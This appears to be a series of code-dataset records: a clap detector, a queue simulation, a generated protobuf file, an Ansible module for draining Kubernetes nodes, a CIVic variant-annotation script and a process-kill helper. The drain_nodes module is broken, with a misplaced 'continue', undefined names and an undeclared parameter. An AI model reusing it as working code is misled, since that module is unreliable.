set to Activated\")\n\telse:\n\t\tprint(\"Started - Currently set to Deactivated\")\n\n\twhile (True):\n\t\tprint(\"Awaiting Clap...\")\n\t\tfeed = sc.MicrophoneFeed()\n\t\tdetector = sc.AmplitudeDetector(feed, threshold=15000000)\n\t\tfor clap in detector:\n\t\t\tprint(\"Clap Detected\")\n\t\t\tif (activated):\n\t\t\t\tresp = requests.put(deactivateUrl, headers=headers)\n\t\t\t\tif resp.status_code == 200:\n\t\t\t\t\tprint(\"PyBot Deactivated\")\n\t\t\t\t\tactivated = False;\n\t\t\t\telse:\n\t\t\t\t\tprint(\"PyBot Deactivated FAILED\")\n\n\n\t\t\telse:\n\t\t\t\tresp = requests.put(activateUrl, headers=headers)\n\t\t\t\tif resp.status_code == 200:\n\t\t\t\t\tprint(\"PyBot Activated\")\n\t\t\t\t\tactivated = True;\n\t\t\t\telse:\n\t\t\t\t\tprint(\"PyBot Activated 
FAILED\")\n\n\t\t\tbreak;\n\n","sub_path":"clapper.py","file_name":"clapper.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"654170706","text":"import numpy.random as nr\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef intensity_to_param(intensity):\n return 10 / intensity\n\n\ndef normal_distribution(params):\n time = nr.normal(abs(params[0]), abs(params[1]))\n return abs(time)\n\n\nclass Generator:\n def __init__(self, law, params, gen_type=1):\n self.func = law\n self.params = params\n self.type = gen_type\n\n def generate(self):\n return self.func(self.params)\n\n\nclass Processor:\n def __init__(self, law, params1, params2):\n self.func = law\n self.params1 = params1\n self.params2 = params2\n self.busy = False\n\n def generate(self, gen_type):\n if gen_type == 1:\n return self.func(self.params1)\n else:\n return self.func(self.params2)\n\n\nclass Model:\n def __init__(self, request_count, generators_params=[[3, 0.5], [2, 0.1]], processors_params=[[2, 0.5], [1, 0.5]]):\n self.start_time = 0\n self.request_count = request_count\n\n self.generators_count = len(generators_params)\n self.generators = []\n for i in range(self.generators_count):\n gen_type = 1\n if i % 2 == 1:\n gen_type = 2\n self.generators.append(Generator(normal_distribution, generators_params[i], gen_type))\n self.processors_count = 1\n self.processors = []\n self.processors.append(Processor(normal_distribution, processors_params[0], processors_params[1]))\n self.generated = 0\n self.queue_length = 0\n self.queue_len_max = 0\n self.avg_waiting_time = 0\n self.processed = 0\n self.started_processing = 0\n self.events = []\n\n def reset(self):\n self.generated = 0\n self.queue_length = 0\n self.queue_len_max = 0\n self.avg_waiting_time = 0\n self.processed = 0\n self.started_processing = 0\n self.events = []\n for processor in self.processors:\n processor.busy = False\n\n def check_len_max(self):\n if self.queue_length > self.queue_len_max:\n self.queue_len_max = self.queue_length\n\n # event: [time of event, type - 'p' or 'g', index in generators or processors lists, waiting time]\n\n def add_event(self, event):\n i = 0\n while i < len(self.events) and event[0] >= self.events[i][0]:\n i += 1\n self.events.insert(i, event)\n\n def modelling(self):\n for i in range(self.generators_count):\n self.add_event([self.start_time, 'g' + str(i + 1), i, 0])\n self.queue_length += 1\n self.generated += 1\n self.check_len_max()\n while self.generated < self.request_count:\n event = self.events.pop(0)\n if event[1][0] == 'g':\n self.start_processing(event)\n else:\n self.finish_operate(event)\n self.avg_waiting_time /= self.started_processing\n return self.avg_waiting_time, self.processed, self.generated\n\n def start_processing(self, event):\n i = 0\n\n # find free processor\n while i < self.processors_count and self.processors[i].busy:\n i += 1\n\n # if found free one:\n if i != self.processors_count:\n self.queue_length -= 1\n self.processors[i].busy = True\n if event[1] == 'g1':\n proc_params = self.processors[i].params1\n else:\n proc_params = self.processors[i].params2\n self.add_event([event[0] + self.processors[i].generate(proc_params), 'p', i, 0])\n self.started_processing += 1\n self.avg_waiting_time += event[3]\n\n # if there is no free processors:\n else:\n j = 0\n while j < len(self.events) and self.events[j][1] != 'p':\n j += 1\n self.add_event([self.events[j][0], event[1], event[2], event[3] + self.events[j][0] - 
event[0]])\n\n # generating new events\n if event[3] == 0:\n self.add_event([event[0] + self.generators[event[2]].generate(), event[1], event[2], 0])\n self.queue_length += 1\n self.generated += 1\n self.check_len_max()\n\n def finish_operate(self, event):\n self.processors[event[2]].busy = False\n self.processed += 1\n\n\ndef get_avg_model(model, times):\n avg_waiting_time = 0\n for i in range(times):\n result_avg_time, result_processed, tmp = model.modelling()\n avg_waiting_time += result_avg_time\n model.reset()\n return avg_waiting_time / times\n\n\ndef get_plot(lambda1, d1, lambda3, d2):\n ro_array = []\n wait_time = []\n ro = 0.05\n generators_params = [[10 / lambda1, d1], [10 / lambda3, d2]]\n\n while ro <= 1:\n ro_array.append(ro)\n lambda2 = lambda1 / ro\n processors_params = [[10 / lambda2, d1], [10 / (lambda3 / ro), d2]]\n model = Model(100, generators_params, processors_params)\n avg_time = get_avg_model(model, 50)\n wait_time.append(avg_time)\n ro += 0.05\n\n plt.plot(ro_array, wait_time)\n plt.xlabel(\"загрузка\")\n plt.ylabel(\"время пребывания\")\n plt.show()\n","sub_path":"lab4/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"88697228","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Generated by the protocol buffer compiler. 
DO NOT EDIT!\n# source: google/cloud/monitoring/dashboard_v1/proto/widget.proto\n\nimport sys\n\n_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode(\"latin1\"))\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n\n# @@protoc_insertion_point(imports)\n\n_sym_db = _symbol_database.Default()\n\n\nfrom google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2\nfrom google.cloud.monitoring_dashboard.v1.proto import (\n scorecard_pb2 as google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_scorecard__pb2,\n)\nfrom google.cloud.monitoring_dashboard.v1.proto import (\n text_pb2 as google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_text__pb2,\n)\nfrom google.cloud.monitoring_dashboard.v1.proto import (\n xychart_pb2 as google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_xychart__pb2,\n)\nfrom google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2\n\n\nDESCRIPTOR = _descriptor.FileDescriptor(\n name=\"google/cloud/monitoring/dashboard_v1/proto/widget.proto\",\n package=\"google.monitoring.dashboard.v1\",\n syntax=\"proto3\",\n serialized_options=_b(\n '\\n\"com.google.monitoring.dashboard.v1B\\013WidgetProtoP\\001ZGgoogle.golang.org/genproto/googleapis/monitoring/dashboard/v1;dashboard'\n ),\n serialized_pb=_b(\n \"\\n7google/cloud/monitoring/dashboard_v1/proto/widget.proto\\x12\\x1egoogle.monitoring.dashboard.v1\\x1a\\x1fgoogle/api/field_behavior.proto\\x1a:google/cloud/monitoring/dashboard_v1/proto/scorecard.proto\\x1a\\x35google/cloud/monitoring/dashboard_v1/proto/text.proto\\x1a\\x38google/cloud/monitoring/dashboard_v1/proto/xychart.proto\\x1a\\x1bgoogle/protobuf/empty.proto\\\"\\x83\\x02\\n\\x06Widget\\x12\\x12\\n\\x05title\\x18\\x01 \\x01(\\tB\\x03\\xe0\\x41\\x01\\x12;\\n\\x08xy_chart\\x18\\x02 \\x01(\\x0b\\x32'.google.monitoring.dashboard.v1.XyChartH\\x00\\x12>\\n\\tscorecard\\x18\\x03 \\x01(\\x0b\\x32).google.monitoring.dashboard.v1.ScorecardH\\x00\\x12\\x34\\n\\x04text\\x18\\x04 \\x01(\\x0b\\x32$.google.monitoring.dashboard.v1.TextH\\x00\\x12'\\n\\x05\\x62lank\\x18\\x05 \\x01(\\x0b\\x32\\x16.google.protobuf.EmptyH\\x00\\x42\\t\\n\\x07\\x63ontentB|\\n\\\"com.google.monitoring.dashboard.v1B\\x0bWidgetProtoP\\x01ZGgoogle.golang.org/genproto/googleapis/monitoring/dashboard/v1;dashboardb\\x06proto3\"\n ),\n dependencies=[\n google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_scorecard__pb2.DESCRIPTOR,\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_text__pb2.DESCRIPTOR,\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_xychart__pb2.DESCRIPTOR,\n google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,\n ],\n)\n\n\n_WIDGET = _descriptor.Descriptor(\n name=\"Widget\",\n full_name=\"google.monitoring.dashboard.v1.Widget\",\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(\n name=\"title\",\n full_name=\"google.monitoring.dashboard.v1.Widget.title\",\n index=0,\n number=1,\n type=9,\n cpp_type=9,\n label=1,\n has_default_value=False,\n default_value=_b(\"\").decode(\"utf-8\"),\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=_b(\"\\340A\\001\"),\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n 
name=\"xy_chart\",\n full_name=\"google.monitoring.dashboard.v1.Widget.xy_chart\",\n index=1,\n number=2,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"scorecard\",\n full_name=\"google.monitoring.dashboard.v1.Widget.scorecard\",\n index=2,\n number=3,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"text\",\n full_name=\"google.monitoring.dashboard.v1.Widget.text\",\n index=3,\n number=4,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"blank\",\n full_name=\"google.monitoring.dashboard.v1.Widget.blank\",\n index=4,\n number=5,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n ],\n extensions=[],\n nested_types=[],\n enum_types=[],\n serialized_options=None,\n is_extendable=False,\n syntax=\"proto3\",\n extension_ranges=[],\n oneofs=[\n _descriptor.OneofDescriptor(\n name=\"content\",\n full_name=\"google.monitoring.dashboard.v1.Widget.content\",\n index=0,\n containing_type=None,\n fields=[],\n )\n ],\n serialized_start=327,\n serialized_end=586,\n)\n\n_WIDGET.fields_by_name[\n \"xy_chart\"\n].message_type = (\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_xychart__pb2._XYCHART\n)\n_WIDGET.fields_by_name[\n \"scorecard\"\n].message_type = (\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_scorecard__pb2._SCORECARD\n)\n_WIDGET.fields_by_name[\n \"text\"\n].message_type = (\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_text__pb2._TEXT\n)\n_WIDGET.fields_by_name[\"blank\"].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"xy_chart\"])\n_WIDGET.fields_by_name[\"xy_chart\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"scorecard\"])\n_WIDGET.fields_by_name[\"scorecard\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"text\"])\n_WIDGET.fields_by_name[\"text\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"blank\"])\n_WIDGET.fields_by_name[\"blank\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\nDESCRIPTOR.message_types_by_name[\"Widget\"] = _WIDGET\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\n\nWidget = _reflection.GeneratedProtocolMessageType(\n \"Widget\",\n (_message.Message,),\n {\n \"DESCRIPTOR\": _WIDGET,\n \"__module__\": \"google.cloud.monitoring.dashboard_v1.proto.widget_pb2\",\n \"__doc__\": \"\"\"Widget contains a single dashboard component and\n configuration of how to present the component 
in the dashboard.\n \n \n Attributes:\n title:\n Optional. The title of the widget.\n content:\n Content defines the component used to populate the widget.\n xy_chart:\n A chart of time series data.\n scorecard:\n A scorecard summarizing time series data.\n text:\n A raw string or markdown displaying textual content.\n blank:\n A blank space.\n \"\"\",\n # @@protoc_insertion_point(class_scope:google.monitoring.dashboard.v1.Widget)\n },\n)\n_sym_db.RegisterMessage(Widget)\n\n\nDESCRIPTOR._options = None\n_WIDGET.fields_by_name[\"title\"]._options = None\n# @@protoc_insertion_point(module_scope)\n","sub_path":"google/cloud/monitoring_dashboard/v1/proto/widget_pb2.py","file_name":"widget_pb2.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"163777575","text":"import random\nfrom ansible.module_utils.basic import AnsibleModule\nfrom kubernetes import client\nfrom kubernetes.client.rest import ApiException\n\nfrom ansible_collections.pystol.actions.plugins.module_utils.k8s_common import load_kubernetes_config\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: drain_nodes\n\nshort_description: A module that drain nodes\n\nversion_added: \"2.8\"\n\ndescription:\n - \"A module that drain nodes\"\n\noptions:\n names:\n default: default\n amount:\n default: 10\n\nauthor:\n - Carlos Camacho\n'''\n\nEXAMPLES = '''\n# Pass in a message\n- name: Test with a message\n drain_nodes:\n names: [\"minikube\", \"worker1\"]\n amount: 3\n'''\n\nRETURN = '''\nfact:\n description: Actual facts\n type: str\n sample: Jane Doe is a smart cookie.\n'''\n\nFACTS = [\n \"{name} is looking great today!\",\n \"{name} is a smart cookie.\",\n \"I’d choose {name}'s company over pizza anytime.\"\n]\n\n\ndef evict_pod(name, namespace):\n core_v1 = client.CoreV1Api()\n body = kubernetes.client.V1beta1Eviction() # V1beta1Eviction\n try:\n api_response = core_v1.create_namespaced_pod_eviction(\n name=name,\n namespace=namespace,\n body=body)\n pprint(api_response)\n except ApiException as e:\n print(\"CoreV1Api->create_namespaced_pod_eviction: %s\\n\" % e)\n\n\ndef cordon_node(name):\n core_v1 = client.CoreV1Api()\n body = {\n \"spec\": {\n \"unschedulable\": True\n }\n }\n try:\n api_response = core_v1.patch_node(\n name=name,\n body=body)\n pprint(api_response)\n except ApiException as e:\n print(\"CoreV1Api->cordon_node: %s\\n\" % e)\n\n\ndef uncordon_node(name):\n core_v1 = client.CoreV1Api()\n body = {\n \"spec\": {\n \"unschedulable\": False\n }\n }\n try:\n api_response = core_v1.patch_node(\n name=name,\n body=body)\n pprint(api_response)\n except ApiException as e:\n print(\"CoreV1Api->uncordon_node: %s\\n\" % e)\n\ndef drain_node(node_name):\n ret = v1.list_pod_for_all_namespaces(\n field_selector=\"spec.nodeName={}\".format(node_name))\n\n if not ret.items:\n continue\n\n # following the drain command from kubectl as best as we can\n eviction_candidates = []\n for pod in ret.items:\n name = pod.metadata.name\n phase = pod.status.phase\n volumes = pod.spec.volumes\n annotations = pod.metadata.annotations\n\n # do not handle mirror pods\n if annotations and \"kubernetes.io/config.mirror\" in annotations:\n logger.debug(\"Not deleting mirror pod '{}' on \"\n \"node '{}'\".format(name, node_name))\n continue\n\n if any(filter(lambda v: v.empty_dir is not None, volumes)):\n logger.debug(\n \"Pod '{}' on node '{}' has a volume made 
\"\n \"of a local storage\".format(name, node_name))\n if not delete_pods_with_local_storage:\n logger.debug(\"Not evicting a pod with local storage\")\n continue\n logger.debug(\"Deleting anyway due to flag\")\n eviction_candidates.append(pod)\n continue\n\n if phase in [\"Succeeded\", \"Failed\"]:\n eviction_candidates.append(pod)\n continue\n\n for owner in pod.metadata.owner_references:\n if owner.controller and owner.kind != \"DaemonSet\":\n eviction_candidates.append(pod)\n break\n elif owner.kind == \"DaemonSet\":\n logger.debug(\n \"Pod '{}' on node '{}' is owned by a DaemonSet. Will \"\n \"not evict it\".format(name, node_name))\n break\n else:\n raise ActivityFailed(\n \"Pod '{}' on node '{}' is unmanaged, cannot drain this \"\n \"node. Delete it manually first?\".format(name, node_name))\n\n if not eviction_candidates:\n logger.debug(\"No pods to evict. Let's return.\")\n return True\n\n logger.debug(\"Found {} pods to evict\".format(len(eviction_candidates)))\n for pod in eviction_candidates:\n eviction = client.V1beta1Eviction()\n\n eviction.metadata = client.V1ObjectMeta()\n eviction.metadata.name = pod.metadata.name\n eviction.metadata.namespace = pod.metadata.namespace\n\n eviction.delete_options = client.V1DeleteOptions()\n try:\n v1.create_namespaced_pod_eviction(\n pod.metadata.name, pod.metadata.namespace, body=eviction)\n except ApiException as x:\n raise ActivityFailed(\n \"Failed to evict pod {}: {}\".format(\n pod.metadata.name, x.body))\n\n pods = eviction_candidates[:]\n started = time.time()\n while True:\n logger.debug(\"Waiting for {} pods to go\".format(len(pods)))\n if time.time() - started > timeout:\n remaining_pods = \"\\n\".join([p.metadata.name for p in pods])\n raise ActivityFailed(\n \"Draining nodes did not completed within {}s. 
\"\n \"Remaining pods are:\\n{}\".format(timeout, remaining_pods))\n\n pending_pods = pods[:]\n for pod in pods:\n try:\n p = v1.read_namespaced_pod(\n pod.metadata.name, pod.metadata.namespace)\n # rescheduled elsewhere?\n if p.metadata.uid != pod.metadata.uid:\n pending_pods.remove(pod)\n continue\n logger.debug(\"Pod '{}' still around in phase: {}\".format(\n p.metadata.name, p.status.phase))\n except ApiException as x:\n if x.status == 404:\n # gone...\n pending_pods.remove(pod)\n pods = pending_pods[:]\n if not pods:\n logger.debug(\"Evicted all pods we could\")\n break\n\n time.sleep(10)\n\n return True\n\n\ndef get_pods(namespace=''):\n api_instance = client.CoreV1Api()\n try:\n if namespace == '':\n api_response = api_instance.list_pod_for_all_namespaces()\n else:\n api_response = api_instance.list_namespaced_pod(\n namespace,\n field_selector='status.phase=Running')\n return api_response\n except ApiException as e:\n print(\"CoreV1Api->list_pod_for_all_namespaces: %s\\n\" % e)\n\n\ndef run_module():\n # define available arguments/parameters a user can pass to the module\n module_args = dict(\n names=dict(type='str', required=True),\n amount=dict(type='int', required=True),\n )\n\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n out = \"\"\n err = \"\"\n rc = 0\n\n namespace = module.params['namespace']\n amount = module.params['amount']\n\n result = dict(\n changed=True,\n stdout=out,\n stderr=err,\n rc=rc,\n )\n\n result['fact'] = random.choice(FACTS).format(\n name=module.params['namespace']\n )\n\n if module.check_mode:\n return result\n\n module.exit_json(**result)\n\n\ndef main():\n run_module()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"actions/plugins/modules/drain_nodes.py","file_name":"drain_nodes.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"598356321","text":"#!/usr/bin/bash\r\n__doc__ = \"\"\"\r\n CIVic is a great database that provides clinical interpretation for variants in cancer:\r\n https://civicdb.org/home\r\n\r\n This script take VCF file that already been annotated with HGVS nomenclature on each variant\r\n (contains pHGVS on info section), and output VCF file with annotated civix information \r\n\"\"\"\r\n__author__ = \"Kai\"\r\n__date__ = \"2019/12/30\"\r\n\r\n\r\nimport pysam\r\nimport argparse\r\nimport os\r\nimport re\r\nfrom collections import defaultdict\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef main(ifname, ofname, civic):\r\n civic_variants, civic_phgvs, civic_chgvs, civic_exon = parse_civic(civic)\r\n with pysam.VariantFile(ifname, \"r\") as vcfin:\r\n if \"civic\" not in vcfin.header.info:\r\n vcfin.header.info.add(\"civic\", \".\", \"String\", \"Information described in CIVic. 
Format: variant|disease|drugs|evidence_level|evidence_statement|variant_origin|citation_id|citation\")\r\n vcfout = pysam.VariantFile(ofname, \"w\", header = vcfin.header)\r\n for rec in vcfin:\r\n # normalise genomic coordinate \r\n if len(rec.ref) == 1 and len(rec.alts[0]) == 1:\r\n start = rec.pos\r\n ref, alt = rec.ref, rec.alts[0]\r\n\r\n elif len(rec.ref) > len(rec.alts[0]):\r\n # deletion\r\n if len(rec.alts[0]) == 1:\r\n start = rec.start + 2\r\n ref = rec.ref[1:]\r\n alt = \"-\"\r\n else:\r\n start = rec.start + 2\r\n ref = rec.ref[1:]\r\n alt = rec.alts[0][1:]\r\n else:\r\n # insertion\r\n if len(rec.alts[0]) == 1:\r\n start = rec.start + 1\r\n ref = \"-\"\r\n alt = rec.alts[0][1:]\r\n else:\r\n start = rec.start + 1\r\n ref = rec.ref[1:]\r\n alt = rec.alts[0][1:]\r\n \r\n if (rec.chrom.lstrip(\"chr\"), start, ref, alt) in civic_variants:\r\n rec.info['civic'] = \"|\".join(civic_variants[(rec.chrom.lstrip(\"chr\"), start, ref, alt)])\r\n continue\r\n\r\n if rec.info['gene'] in civic_phgvs:\r\n if rec.info['pHGVS']:\r\n phgvs = convert_amino_acid(rec.info['pHGVS'].lstrip(\"p.\"))\r\n if phgvs in civic_phgvs[rec.info['gene']]:\r\n rec.info['civic'] = \"|\".join(civic_phgvs[rec.info['gene']][rec.info['pHGVS']])\r\n if phgvs[:-1] in civic_phgvs[rec.info['gene']]:\r\n rec.info['civic'] = \"|\".join(civic_phgvs[rec.info['gene']][rec.info['pHGVS']])\r\n if rec.info['cHGVS'] in civic_chgvs[rec.info['gene']]:\r\n rec.info['civic'] = \"|\".join(civic_chgvs[rec.info['gene']][rec.info['cHGVS']])\r\n\r\n vcfout.write(rec)\r\n\r\n\r\ndef convert_amino_acid(hgvs):\r\n \"\"\"\r\n Convert three-letter abbreviation to one-letter abbreviation, so that hgvs name can meet oncoKB criteria\r\n e.g. p.Pro373fs --> p.P373fs\r\n \"\"\"\r\n amino_dict = {'Gly': 'G', 'Cys': 'C', 'Glu': 'E', 'Asp': 'D', 'Ile': 'I',\r\n 'Pro': 'P', 'Tyr': 'Y', 'Lys': 'K', 'Gln': 'Q', 'Trp': 'W',\r\n 'Leu': 'L', 'Phe': 'F', 'Val': 'V', 'Ser': 'S', 'Met': 'M',\r\n 'Ala': 'A', 'His': 'H', 'Ter': 'X', 'Asn': 'N', 'Thr': 'T',\r\n 'Arg': 'R'}\r\n new_hgvs = hgvs\r\n for index, letter in enumerate(hgvs):\r\n if hgvs[index: index+3] not in amino_dict:\r\n continue\r\n new_hgvs = new_hgvs.replace(hgvs[index:index+3], amino_dict[hgvs[index:index+3]])\r\n return new_hgvs\r\n\r\n\r\ndef parse_civic(civic):\r\n \"\"\"\r\n parse civic database into a dictionary. 
Format:\r\n civic_database = {gene: {variant: (disease, drug, evidence_level, evidence_statement, variant_origin, citation_id, citation), ...}, ...}\r\n \"\"\"\r\n civic_variants = {}\r\n civic_phgvs = defaultdict(dict)\r\n civic_chgvs = defaultdict(dict)\r\n civic_exon = defaultdict(dict)\r\n\r\n df = pd.read_csv(civic, sep=\"\\t\", )\r\n for index, row in df.iterrows():\r\n # ignore non-snp/indel variants\r\n if not pd.isnull(row['representative_transcript2']):\r\n continue\r\n if \"-\" in row['variant']:\r\n continue\r\n if 'EXPRESSION' in row['variant']:\r\n continue\r\n if 'fusion' in row['variant'].lower():\r\n continue\r\n if 'AMPLIFICATION' in row['variant']:\r\n continue\r\n if 'PHOSPHORYLATION' in row['variant']:\r\n continue\r\n if 'REARRANGEMENT' in row['variant']:\r\n continue\r\n if 'METHYLATION' in row['variant']:\r\n continue\r\n if 'TRANSLOCATION' in row['variant']:\r\n continue\r\n if 'SERUM' in row['variant']:\r\n continue\r\n if 'HOMOZYGOSITY' in row['variant']:\r\n continue\r\n if 'Alu insertion' in row['variant']:\r\n continue\r\n if 'MISLOCALIZATION' in row['variant']:\r\n continue\r\n if 'ALTER' in row['variant']:\r\n continue\r\n if 'VARIATION' in row['variant']:\r\n continue\r\n if 'WILD' in row['variant']:\r\n continue\r\n\r\n # match via genomic coordinate\r\n if row['drugs'] is np.nan:\r\n drug = \"\"\r\n else:\r\n drug = row['drugs']\r\n\r\n evidence_statement = str(row['evidence_statement'].encode(\"utf-8\"))\r\n if not pd.isnull(row['reference_bases']):\r\n ikey = (row['chromosome'], int(row['start']), row['reference_bases'], row['variant_bases'])\r\n civic_variants[ikey] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n continue\r\n\r\n # rest of variant matches via HGVS momenclature\r\n m1 = re.search(r'[A-Z]\\d+[A-Z]', row['variant'])\r\n m2 = re.search(r'[A-Z]\\d+', row['variant'])\r\n m3 = re.search(r'([cC]\\.(\\d+)[\\+-]\\d+[A-Z]>[A-Z])', row['variant'])\r\n m4 = re.search(r'EXON (\\d+) MUTATION', row['variant'])\r\n m5 = re.search(r'EXON (\\d+)-(\\d+) MUTATION', row['variant'])\r\n if m1 or m2:\r\n civic_phgvs[row['gene']][row['variant']] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n elif m3:\r\n variant = \"c.\" + m3.group(0)[2:]\r\n civic_chgvs[row['gene']][variant] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n elif m4:\r\n civic_exon[row['gene']][m4.group(1)] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n elif m5:\r\n civic_exon[row['gene']][m5.group(1)] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n civic_exon[row['gene']][m5.group(2)] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n\r\n return civic_variants, civic_phgvs, civic_chgvs, civic_exon\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=__doc__)\r\n parser.add_argument(\"input\", help=\"VCF file that has HGVS names annotated\")\r\n parser.add_argument(\"civic\", help=\"CIVic database 
(ClinicalEvidenceSummaries)\")\r\n parser.add_argument(\"-o\", \"--output\", help=\"output filename (optional)\")\r\n args = parser.parse_args()\r\n\r\n ifname = os.path.abspath(args.input)\r\n if not args.output:\r\n ofname = os.path.join(os.path.dirname(ifname), \r\n os.path.basename(ifname).split(\".\")[0] + \".civic_anno.vcf\")\r\n else:\r\n ofname = args.output\r\n \r\n main(ifname, ofname, args.civic)\r\n\r\n\r\n\r\n","sub_path":"tertiary_analysis/anno_civic.py","file_name":"anno_civic.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"492256184","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Statement: Sorry for this shit code \n@Time : 2020/5/13 14:45\n@Author : Jarvis\n\"\"\"\nimport os\nimport argparse\nimport re\nfrom main_code.gen_logger import get_logger\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--kill', type=str, help='ID of the task to terminate')\n args = parser.parse_args()\n task_id = args.kill\n logger = get_logger(task_id)\n logger.warning(f\"Task {task_id} is being terminated\")\n processes = os.popen(\"ps -ef | grep python\").readlines()\n\n for p in processes:\n if len(p) < len(task_id):\n continue\n if p.endswith(task_id + '\\n'):\n span = re.search(r\"\\s\\d+\\s\", p).span()\n num = p[span[0]: span[1]]\n os.popen(f\"kill -9 {num}\")\n logger.warning(f\"Task {task_id} has been terminated\")\n","sub_path":"kill.py","file_name":"kill.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
